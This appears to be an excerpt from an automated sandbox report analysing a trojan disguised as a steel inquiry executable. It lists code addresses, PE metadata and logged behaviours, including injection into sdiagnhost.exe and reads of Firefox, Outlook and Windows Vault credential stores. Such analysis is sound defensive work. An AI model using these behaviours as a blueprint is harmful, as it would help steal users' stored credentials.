Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050F24A4		9_2_050F24A4
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E7F99		9_2_050E7F99
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E7FA4		9_2_050E7FA4
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E7E54		9_2_050E7E54
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E9E74		9_2_050E9E74
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050F06A4		9_2_050F06A4
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050F06A0		9_2_050F06A0
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_05108BE4		9_2_05108BE4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D6E4F6		10_2_04D6E4F6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D72446		10_2_04D72446
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D64420		10_2_04D64420
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D80591		10_2_04D80591
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC0535		10_2_04CC0535
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CDC6E0		10_2_04CDC6E0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CBC7C0		10_2_04CBC7C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CE4750		10_2_04CE4750
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC0770		10_2_04CC0770
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D52000		10_2_04D52000
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D781CC		10_2_04D781CC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D801AA		10_2_04D801AA
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D48158		10_2_04D48158
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CB0100		10_2_04CB0100
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D5A118		10_2_04D5A118
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D402C0		10_2_04D402C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D60274		10_2_04D60274
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CCE3F0		10_2_04CCE3F0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D803E6		10_2_04D803E6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7A352		10_2_04D7A352
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CB0CF2		10_2_04CB0CF2
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D60CB5		10_2_04D60CB5
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC0C00		10_2_04CC0C00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CBADE0		10_2_04CBADE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CD8DBF		10_2_04CD8DBF
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D5CD1F		10_2_04D5CD1F
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CCAD00		10_2_04CCAD00
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7EEDB		10_2_04D7EEDB
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7CE93		10_2_04D7CE93
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CD2E90		10_2_04CD2E90
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC0E59		10_2_04CC0E59
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7EE26		10_2_04D7EE26
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CB2FC8		10_2_04CB2FC8
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CCCFE0		10_2_04CCCFE0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D3EFA0		10_2_04D3EFA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D34F40		10_2_04D34F40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D62F30		10_2_04D62F30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D02F28		10_2_04D02F28
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CE0F30		10_2_04CE0F30
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CEE8F0		10_2_04CEE8F0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CA68B8		10_2_04CA68B8
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CCA840		10_2_04CCA840
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC2840		10_2_04CC2840
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC29A0		10_2_04CC29A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D8A9A6		10_2_04D8A9A6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CD6962		10_2_04CD6962
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CBEA80		10_2_04CBEA80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D76BD7		10_2_04D76BD7
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7AB40		10_2_04D7AB40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CB1460		10_2_04CB1460
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7F43F		10_2_04D7F43F
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D5D5B0		10_2_04D5D5B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D77571		10_2_04D77571
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D716CC		10_2_04D716CC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7F7B0		10_2_04D7F7B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC70C0		10_2_04CC70C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D6F0CC		10_2_04D6F0CC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7F0E0		10_2_04D7F0E0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D770E9		10_2_04D770E9
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CCB1B0		10_2_04CCB1B0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CF516C		10_2_04CF516C
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D8B16B		10_2_04D8B16B
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CAF172		10_2_04CAF172
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CDB2C0		10_2_04CDB2C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D612ED		10_2_04D612ED
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC52A0		10_2_04CC52A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D0739A		10_2_04D0739A
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CAD34C		10_2_04CAD34C
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7132D		10_2_04D7132D
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7FCF2		10_2_04D7FCF2
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D39C32		10_2_04D39C32
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CDFDC0		10_2_04CDFDC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC3D40		10_2_04CC3D40
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D71D5A		10_2_04D71D5A
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D77D73		10_2_04D77D73
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC9EB0		10_2_04CC9EB0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC1F92		10_2_04CC1F92
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7FFB1		10_2_04D7FFB1
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7FF09		10_2_04D7FF09
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC38E0		10_2_04CC38E0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D2D800		10_2_04D2D800
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CC9950		10_2_04CC9950
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CDB950		10_2_04CDB950
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D55910		10_2_04D55910
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D6DAC6		10_2_04D6DAC6
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D05AA0		10_2_04D05AA0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D61AA3		10_2_04D61AA3
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D5DAAC		10_2_04D5DAAC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D77A46		10_2_04D77A46
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7FA49		10_2_04D7FA49
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D33A6C		10_2_04D33A6C
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D35BF0		10_2_04D35BF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CFDBF9		10_2_04CFDBF9
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CDFB80		10_2_04CDFB80
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04D7FB76		10_2_04D7FB76
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CB2420		10_2_02CB2420
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CAD297		10_2_02CAD297
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CAD2A0		10_2_02CAD2A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CCC230		10_2_02CCC230
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CAD4C0		10_2_02CAD4C0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CAB4A0		10_2_02CAB4A0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CAB5E5		10_2_02CAB5E5
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CAB5F0		10_2_02CAB5F0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CB5AF0		10_2_02CB5AF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CB3CEC		10_2_02CB3CEC
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_02CB3CF0		10_2_02CB3CF0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04A8E4C3		10_2_04A8E4C3
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04A8E3A8		10_2_04A8E3A8
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04A8E85E		10_2_04A8E85E
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04A8D928		10_2_04A8D928

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: String function: 00EF7E54 appears 111 times
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: String function: 00F1EA12 appears 86 times
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: String function: 00E9B970 appears 280 times
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: String function: 00EE5130 appears 58 times
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: String function: 00F2F290 appears 105 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04D3F290 appears 105 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04CF5130 appears 58 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04CAB970 appears 278 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04D07E54 appears 102 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: String function: 04D2EA12 appears 86 times

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: No import functions for PE file found

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1262354489.0000000000C25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe
Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1356383526.00000000009C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesdiagnhost.exej% vs INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe
Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.0000000001141000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe
Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1325440833.00000000009BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesdiagnhost.exej% vs INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe
Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1264456359.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@3/3

Source: C:\Windows\SysWOW64\sdiagnhost.exe

File created: C:\Users\user~1\AppData\Local\Temp\8m89j3K6

Jump to behavior

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sdiagnhost.exe, 0000000A.00000002.2111184637.000000000302A000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2111184637.0000000003025000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2111184637.000000000301A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Virustotal: Detection: 52%
Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	ReversingLabs: Detection: 58%

Source: unknown	Process created: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe "C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe"
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: ieframe.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: netapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wkscli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: mlang.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: winsqlite3.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Section loaded: rasadhlp.dll			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1262354489.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.000000000100E000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1264456359.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000003.1358875567.0000000004ACB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000003.1356722753.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1262354489.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.000000000100E000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1264456359.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 0000000A.00000003.1358875567.0000000004ACB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000003.1356722753.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdb source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1356383526.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1325440833.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000003.1295593337.0000000001355000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 1h36yydaHEcruJ.exe, 00000009.00000000.1278920480.00000000008AF000.00000002.00000001.01000000.00000007.sdmp, 1h36yydaHEcruJ.exe, 0000000B.00000000.1430815975.00000000008AF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: sdiagnhost.pdbGCTL source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1356383526.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1325440833.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000003.1295593337.0000000001355000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB6833 push esi; retf 4165h		0_2_00AB676E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAD859 push es; ret		0_2_00AAD85A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AA2125 pushad ; iretd		0_2_00AA2136
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB6941 push ss; iretd		0_2_00AB6954
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB2AB9 push ebp; iretd		0_2_00AB2ABA
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AA5223 push ebp; iretd		0_2_00AA5235
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAD4BF push ds; ret		0_2_00AAD4C5
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AA3430 push eax; ret		0_2_00AA3432
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAD5E2 push esi; iretd		0_2_00AAD594
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAD505 push esi; iretd		0_2_00AAD594
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AAD57B push esi; iretd		0_2_00AAD594
